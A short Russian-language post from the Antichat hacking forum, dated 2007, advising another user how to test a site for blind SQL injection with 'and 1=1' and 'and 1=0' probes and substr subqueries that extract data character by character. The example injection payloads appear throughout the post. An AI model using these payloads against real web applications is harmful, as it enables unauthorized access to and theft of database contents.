22.11.2007, 03:54
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами:
10309346
Репутация:
4303
|
|
ну в общем то Scipio правильно тебе посоветовал с подзапросами
Попробуй выполнить
select 1 where id=4 and 1=1
select 1 where id=4 and 1=0
в последнем должна появится ошибка
Если ошибка есть (страница изменилась) то используй подзапросы которые тебе выше дал Scipio
например при таком
select 1 where id=4 and substr((select 'xxxxxxx'),1,1)='x' - появится страница без ошибки
select 1 where id=4 and substr((select 'xxxxxxx'),1,1)='a' - должна быть ошибка
Ну а если при select 1 where id=4 and 1=0 гурзится та же страница что и при правильном запросе, то имхо инжекция бесполезна
|
|
|